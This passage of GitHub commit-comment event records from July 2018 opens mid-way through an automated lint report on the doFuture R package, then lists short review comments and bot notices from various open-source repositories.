{\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:94:106:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L94) *style:* **Variable or function name should be snake_case.**\n```r\n​getGlobalsAndPackages_doFuture <- function(expr, envir, export = NULL, noexport = NULL, packages = NULL, globalsAs, debug = FALSE) {\n                                                                                                         ^~~~~~~~~\n```\n[R/globals.R:95:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L95) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.language(expr) || is.expression(expr))\n  ^~~~~~~~~~~\n```\n[R/globals.R:96:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L96) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.environment(envir))\n  ^~~~~~~~~~~\n```\n[R/globals.R:97:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L97) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.logical(debug))\n  ^~~~~~~~~~~\n```\n[R/globals.R:101:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L101) *style:* **Variable or function name should be snake_case.**\n```r\n​  globalsAs <- globalsAs(globalsAs)\n  ^~~~~~~~~\n```\n[R/globals.R:106:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L106) *style:* **Variable or function name should be snake_case.**\n```r\n​      globalsAs <- gsub(\"-unless-manual$\", \"\", globalsAs)\n      ^~~~~~~~~\n```\n[R/globals.R:108:7:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L108) *style:* **Variable or function name should be snake_case.**\n```r\n​      globalsAs <- \"manual\"\n      ^~~~~~~~~\n```\n[R/globals.R:113:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L113) *style:* **Variable or function name should be snake_case.**\n```r\n​  withWarning <- grepl(\"-with-warning$\", globalsAs)\n  ^~~~~~~~~~~\n```\n[R/globals.R:114:20:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L114) *style:* **Variable or function name should be snake_case.**\n```r\n​  if (withWarning) globalsAs <- gsub(\"-with-warning$\", \"\", globalsAs)\n                   ^~~~~~~~~\n```\n[R/globals.R:138:11:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L138) *warning:* **no visible global function definition for ‘getGlobalsAndPackages’**\n```r\n​    gp <- getGlobalsAndPackages(expr, envir = globals_envir, globals = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:150:11:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L150) *warning:* **no visible global function definition for ‘getGlobalsAndPackages’**\n```r\n​    gp <- getGlobalsAndPackages(expr, envir = globals_envir, globals = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:160:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L160) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​  mstr(globals)\n  ^~~~\n```\n[R/globals.R:161:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L161) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(\"...future.x_ii\" %in% names(globals))\n  ^~~~~~~~~~~\n```\n[R/globals.R:162:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/globals.R:171:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L171) *style:* **Lines should not be more than 80 characters.**\n```r\n​      warning(sprintf(\"Detected a foreach(..., .export = c(%s)) call where '.export' might lack one or more variables (as identified by globalsAs = c(%s) of which some might be false positives): %s\", paste(dQuote(globals2), collapse = \", \"), paste(sQuote(globalsAs), collapse = \", \"), paste(dQuote(missing), collapse = \", \")))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:175:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/globals.R:180:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L180) *style:* **Lines should not be more than 80 characters.**\n```r\n​      mdebug(\"  - appending %d '.export' globals (not already found through automatic lookup): %s\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:194:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/globals.R#L194) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/options.R:1:40:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/options.R#L1) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' Options used by the doFuture adapter \n                                       ^\n```\n[R/registerDoFuture.R:8:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:19:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L19) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:22:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:51:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:61:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:68:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:72:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:75:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:76:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:90:3:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L90) *warning:* **no visible global function definition for ‘setDoPar’**\n```r\n​  setDoPar(doFuture, data = list(globalsAs = globalsAs), info = info)\n  ^~~~~~~~\n```\n[R/registerDoFuture.R:90:12:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/registerDoFuture.R#L90) *warning:* **no visible binding for global variable ‘doFuture’**\n```r\n​  setDoPar(doFuture, data = list(globalsAs = globalsAs), info = info)\n           ^~~~~~~~\n```\n[R/utils.R:33:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/R/utils.R#L33) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/cluster-missing-doFuture-pkg.R:12:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L12) *style:* **Variable or function name should be snake_case.**\n```r\n​setupClusterWithoutPkgs <- function(type = \"PSOCK\",\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/cluster-missing-doFuture-pkg.R:25:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:51:74:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​  cl <- setupClusterWithoutPkgs(type, withouts = c(\"future\", \"doFuture\"))  \n                                                                         ^~\n```\n[tests/cluster-missing-doFuture-pkg.R:54:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[tests/cluster-missing-doFuture-pkg.R:68:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:69:38:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  cl <- setupClusterWithoutPkgs(type)  \n                                     ^~\n```\n[tests/cluster-missing-doFuture-pkg.R:72:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[tests/cluster-missing-doFuture-pkg.R:86:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:89:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:91:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/cluster-missing-doFuture-pkg.R#L91) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/foreach,globals.R:41:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/foreach,globals.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/foreach,globals.R:48:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/foreach,globals.R#L48) *style:* **Lines should not be more than 80 characters.**\n```r\n​  stopifnot((strategy %in% c(c(\"cluster\", \"multisession\")) && inherits(y, \"simpleError\")) || identical(y, y_truth))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/foreach,globals.R:64:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/foreach,globals.R#L64) *style:* **Variable or function name should be snake_case.**\n```r\n​X <- matrix(1:4, nrow = 3L, ncol = 4L)\n^\n```\n[tests/foreach,globals.R:88:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/foreach,globals.R#L88) *style:* **Lines should not be more than 80 characters.**\n```r\n​message(\"*** doFuture - automatically finiding ambiguous global/local variables ...\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/foreach,globals.R:106:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/foreach,globals.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/foreach,globals.R:112:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/foreach,globals.R#L112) *style:* **Lines should not be more than 80 characters.**\n```r\n​message(\"*** doFuture - automatically finiding ambiguous global/local variables ... DONE\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/options.R:5:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/options.R#L5) *style:* **Variable or function name should be snake_case.**\n```r\n​globalsAs <- doFuture:::globalsAs\n^~~~~~~~~\n```\n[tests/zzz_opt-in,caret.R:10:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/zzz_opt-in,caret.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/zzz_opt-in,plyr.R:5:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/zzz_opt-in,plyr.R#L5) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/zzz_opt-in,plyr.R:10:1:](https://github.com/HenrikBengtsson/doFuture/blob/7063ab3b0e93004e8051aace4d681ab513876d44/tests/zzz_opt-in,plyr.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-05T02:21:06Z"}
{"id":"7920655868","type":"CommitCommentEvent","actor":{"login":"nosmokingbandit"},"repo":{"name":"nosmokingbandit/Watcher3"},"payload":{"comment":{"id":29600865,"position":null,"line":null,"path":null,"commit_id":"aecbed7bd4bce802e1c117ea579f093e99a05e2c","created_at":"2018-07-05T02:29:01Z","updated_at":"2018-07-05T02:29:01Z","author_association":"OWNER","body":"This is not my fault. I blame sourcetree."}},"created_at":"2018-07-05T02:29:01Z"}
{"id":"7920656423","type":"CommitCommentEvent","actor":{"login":"15331335"},"repo":{"name":"longjj/MineCube"},"payload":{"comment":{"id":29600866,"position":32,"line":35,"path":"include/Gui.hpp","commit_id":"fe5a457ba60db81013b0dd5ac8dcbf6b5fbdfbce","created_at":"2018-07-05T02:29:14Z","updated_at":"2018-07-05T02:29:14Z","author_association":"COLLABORATOR","body":"在文件末尾 #endif 后面的 GUI_HPP 应该注释起来。"}},"created_at":"2018-07-05T02:29:14Z"}
{"id":"7920657075","type":"CommitCommentEvent","actor":{"login":"StefanCristian"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":29600868,"position":null,"line":null,"path":null,"commit_id":"917f53cf13c36d32c175f80f2074576595830573","created_at":"2018-07-05T02:29:34Z","updated_at":"2018-07-05T02:29:34Z","author_association":"NONE","body":"Apologies. I meant the libmount tests, and yeah, it would require some effort to maintain. I would, but am not ready yet."}},"created_at":"2018-07-05T02:29:34Z"}
{"id":"7920658369","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/eos-updater"},"payload":{"comment":{"id":29600870,"position":6,"line":24,"path":"eos-updater-flatpak-installer/eos-updater-flatpak-installer.service.in","commit_id":"fc03bd7be598d0a3114cb56e1b40113fca2a8f2e","created_at":"2018-07-05T02:30:11Z","updated_at":"2018-07-05T02:30:11Z","author_association":"CONTRIBUTOR","body":"Does this also affect flatpaks when they are run? Maybe we need to adjust the companion app too?"}},"created_at":"2018-07-05T02:30:11Z"}
{"id":"7920659192","type":"CommitCommentEvent","actor":{"login":"vmunguia"},"repo":{"name":"vmunguia/devopsbuddy"},"payload":{"comment":{"id":29600873,"position":null,"line":null,"path":null,"commit_id":"983c51dd5dc074e31447f3c59211b20c0306f221","created_at":"2018-07-05T02:30:32Z","updated_at":"2018-07-05T02:30:32Z","author_association":"OWNER","body":"separar"}},"created_at":"2018-07-05T02:30:32Z"}
{"id":"7920661968","type":"CommitCommentEvent","actor":{"login":"doradomiguel35"},"repo":{"name":"doradomiguel35/Capstone_UnseeIt"},"payload":{"comment":{"id":29600875,"position":6,"line":8,"path":"content.js","commit_id":"3698537cd5ce53e6b03ef80e0e25dd5de8a79cd2","created_at":"2018-07-05T02:31:47Z","updated_at":"2018-07-05T02:31:47Z","author_association":"OWNER","body":"// i alphabetical order"}},"created_at":"2018-07-05T02:31:47Z"}
{"id":"7920663828","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"AndyGrant/Stockfish"},"payload":{"comment":{"id":29600876,"position":null,"line":null,"path":null,"commit_id":"fcd4b0240b2da6b61035375e214a3592c6bc3f01","created_at":"2018-07-05T02:32:37Z","updated_at":"2018-07-05T02:32:37Z","author_association":"NONE","body":"I think this is [0,5] not [0,4]\r\nhttp://tests.stockfishchess.org/tests/view/5b3d75290ebc5902b9ffe480"}},"created_at":"2018-07-05T02:32:37Z"}
{"id":"7920665663","type":"CommitCommentEvent","actor":{"login":"fangmihu"},"repo":{"name":"fangmihu/yunxiao"},"payload":{"comment":{"id":29600878,"position":null,"line":null,"path":null,"commit_id":"bb870a2773940b2a377be3192fcedfbd17caf0af","created_at":"2018-07-05T02:33:29Z","updated_at":"2018-07-05T02:33:29Z","author_association":"OWNER","body":"init"}},"created_at":"2018-07-05T02:33:29Z"}
{"id":"7920669467","type":"CommitCommentEvent","actor":{"login":"TheRealPear"},"repo":{"name":"Cerium3/Modpack"},"payload":{"comment":{"id":29600882,"position":null,"line":null,"path":null,"commit_id":"2d7ad22bf41e1a0a1e2eb220ad954988720c3421","created_at":"2018-07-05T02:35:11Z","updated_at":"2018-07-05T02:35:11Z","author_association":"COLLABORATOR","body":"I am triggered"}},"created_at":"2018-07-05T02:35:11Z"}
{"id":"7920670695","type":"CommitCommentEvent","actor":{"login":"XzxEmbedded"},"repo":{"name":"Canaan-Creative/cgminer"},"payload":{"comment":{"id":29600883,"position":null,"line":null,"path":null,"commit_id":"ad49bfb047abf732db4761df6fe22cc761168cd9","created_at":"2018-07-05T02:35:48Z","updated_at":"2018-07-05T02:35:48Z","author_association":"NONE","body":"![avalon851](https://user-images.githubusercontent.com/31298114/42299603-b05c368c-803e-11e8-99e8-f51bff8d3b24.png)\r\nThis codes should not need if else,  they have been 851 branch. thanks. "}},"created_at":"2018-07-05T02:35:48Z"}
{"id":"7920674836","type":"CommitCommentEvent","actor":{"login":"programbo"},"repo":{"name":"storyblok/storyblok-js-client"},"payload":{"comment":{"id":29600887,"position":40,"line":40,"path":"dist/index.d.ts","commit_id":"1b8102e3182c52d29a4d3a75f789643fd76b6596","created_at":"2018-07-05T02:37:42Z","updated_at":"2018-07-05T02:37:42Z","author_association":"NONE","body":"For the sake of completion:\r\n```typescript\r\ncontent: {\r\n  component: string\r\n  _uid: string\r\n  [index: string]: string\r\n}"}},"created_at":"2018-07-05T02:37:42Z"}
{"id":"7920675712","type":"CommitCommentEvent","actor":{"login":"honemepool"},"repo":{"name":"abseil/abseil-cpp"},"payload":{"comment":{"id":29600888,"position":null,"line":null,"path":null,"commit_id":"ba8d6cf07766263723e86736f20a51c1c9c67b19","created_at":"2018-07-05T02:38:07Z","updated_at":"2018-07-05T02:38:07Z","author_association":"NONE","body":"Ok"}},"created_at":"2018-07-05T02:38:07Z"}
{"id":"7920676638","type":"CommitCommentEvent","actor":{"login":"programbo"},"repo":{"name":"storyblok/storyblok-js-client"},"payload":{"comment":{"id":29600889,"position":67,"line":67,"path":"dist/index.d.ts","commit_id":"1b8102e3182c52d29a4d3a75f789643fd76b6596","created_at":"2018-07-05T02:38:29Z","updated_at":"2018-07-05T02:38:29Z","author_association":"NONE","body":"See Stories.data.story.content above ☝️ "}},"created_at":"2018-07-05T02:38:29Z"}
{"id":"7920680101","type":"CommitCommentEvent","actor":{"login":"honemepool"},"repo":{"name":"honemepool/homemepool"},"payload":{"comment":{"id":29600894,"position":null,"line":null,"path":null,"commit_id":"70b328a4dc521d452b59d7d6aa9743f47b948aaf","created_at":"2018-07-05T02:40:04Z","updated_at":"2018-07-05T02:40:04Z","author_association":"OWNER","body":"Good "}},"created_at":"2018-07-05T02:40:04Z"}
{"id":"7920680649","type":"CommitCommentEvent","actor":{"login":"lilidream"},"repo":{"name":"lilidream/w-site"},"payload":{"comment":{"id":29600895,"position":null,"line":null,"path":null,"commit_id":"886dfa9c7d9fc80a25ecd5f75dc134d701663142","created_at":"2018-07-05T02:40:16Z","updated_at":"2018-07-05T02:40:16Z","author_association":"OWNER","body":"说明"}},"created_at":"2018-07-05T02:40:16Z"}
{"id":"7920681412","type":"CommitCommentEvent","actor":{"login":"paloalto16"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":29600896,"position":2,"line":2,"path":"bin/setup","commit_id":"112735c36a756b6c1030cccb14aaf49469ec667c","created_at":"2018-07-05T02:40:35Z","updated_at":"2018-07-05T02:40:35Z","author_association":"NONE","body":"https://github.com/github/hubot/blob/ed25584f5ac2520a6c28547ffd0961c7abd7ea49/README.md"}},"created_at":"2018-07-05T02:40:35Z"}
{"id":"7920683095","type":"CommitCommentEvent","actor":{"login":"beichen2012"},"repo":{"name":"beichen2012/LabelMe"},"payload":{"comment":{"id":29600897,"position":null,"line":null,"path":null,"commit_id":"941a83a9871a8f509e4eb7955fdbdf1cdcb54b3a","created_at":"2018-07-05T02:41:19Z","updated_at":"2018-07-05T02:41:19Z","author_association":"OWNER","body":"是的。界面是仿LabelMe写的。移动这个功能没有加上。\r\n使用鼠标滚轮可以放大2级（这个可能有bug，没有测），在放大模式下，可以拖动图片。\r\n\r\njson里面包含了相应的坐标数据。PNG标记文件可能通过json来生成（比如使用cv2.drawContours，line_width=-1即可生成）。"}},"created_at":"2018-07-05T02:41:19Z"}
{"id":"7920688107","type":"CommitCommentEvent","actor":{"login":"oleksiyp"},"repo":{"name":"mockk/mockk"},"payload":{"comment":{"id":29600898,"position":null,"line":null,"path":null,"commit_id":"1087750b0efac3015e7876710a1f97b1cf43c7cd","created_at":"2018-07-05T02:43:34Z","updated_at":"2018-07-05T02:43:34Z","author_association":"COLLABORATOR","body":"Thanks for PR, will get back to it on weekends, before release on Sunday"}},"created_at":"2018-07-05T02:43:34Z"}
{"id":"7920694941","type":"CommitCommentEvent","actor":{"login":"Harvie"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29600908,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-05T02:46:38Z","updated_at":"2018-07-05T02:46:38Z","author_association":"CONTRIBUTOR","body":"@SteveMoto what do you exactly mean? i am not aware that i was adding some numpy based code."}},"created_at":"2018-07-05T02:46:38Z"}
{"id":"7920696739","type":"CommitCommentEvent","actor":{"login":"programbo"},"repo":{"name":"storyblok/storyblok-js-client"},"payload":{"comment":{"id":29600909,"position":35,"line":35,"path":"dist/index.d.ts","commit_id":"1b8102e3182c52d29a4d3a75f789643fd76b6596","created_at":"2018-07-05T02:47:27Z","updated_at":"2018-07-05T02:47:27Z","author_association":"NONE","body":"Is it worth adding the `headers` data?\r\n```typescript\r\nheader: {\r\n  cache-control: string\r\n  connection: string\r\n  content-length: string\r\n  content-type: string\r\n  date: string\r\n  etag: string\r\n  server: string\r\n  vary: string\r\n  via: string\r\n  x-amz-cf-id: string\r\n  x-cache: string\r\n  x-content-type-options: string\r\n  x-frame-options: string\r\n  x-request-id: string\r\n  x-runtime: string\r\n  x-xss-protection: string\r\n}\r\n```\r\n\r\nIt's easy, but I don't know if these fields will change and require regular maintenance. Will adding it to the type defs add more value than clutter, and is it just too meta? Just added it here for thoughts and completeness."}},"created_at":"2018-07-05T02:47:27Z"}
{"id":"7920696892","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29600910,"position":null,"line":null,"path":null,"commit_id":"adbae573f2897db0d2a8aec0ab3d93e083e4e030","created_at":"2018-07-05T02:47:31Z","updated_at":"2018-07-05T02:47:31Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-05T02:47:31Z"}
{"id":"7920696985","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29600911,"position":null,"line":null,"path":null,"commit_id":"ed5f25be268131c8838ca1ec5040ea788a5425a1","created_at":"2018-07-05T02:47:34Z","updated_at":"2018-07-05T02:47:34Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/functions/get_image.js, js/src/functions/import.js"}},"created_at":"2018-07-05T02:47:34Z"}
{"id":"7920699892","type":"CommitCommentEvent","actor":{"login":"programbo"},"repo":{"name":"storyblok/storyblok-js-client"},"payload":{"comment":{"id":29600913,"position":8,"line":8,"path":"dist/index.d.ts","commit_id":"1b8102e3182c52d29a4d3a75f789643fd76b6596","created_at":"2018-07-05T02:48:56Z","updated_at":"2018-07-05T02:48:56Z","author_association":"NONE","body":"I thought `event` always needed to be a `string` type."}},"created_at":"2018-07-05T02:48:56Z"}
{"id":"7920703873","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29600921,"position":null,"line":null,"path":null,"commit_id":"2a36ca10d758b5ff6d354e6e4d504ca6655195a7","created_at":"2018-07-05T02:50:41Z","updated_at":"2018-07-05T02:50:41Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/66/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/66//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2a36ca10d758b5ff6d354e6e4d504ca6655195a7/66/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2a36ca10d758b5ff6d354e6e4d504ca6655195a7/66/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2a36ca10d758b5ff6d354e6e4d504ca6655195a7/66/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2a36ca10d758b5ff6d354e6e4d504ca6655195a7/66/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T02:50:41Z"}
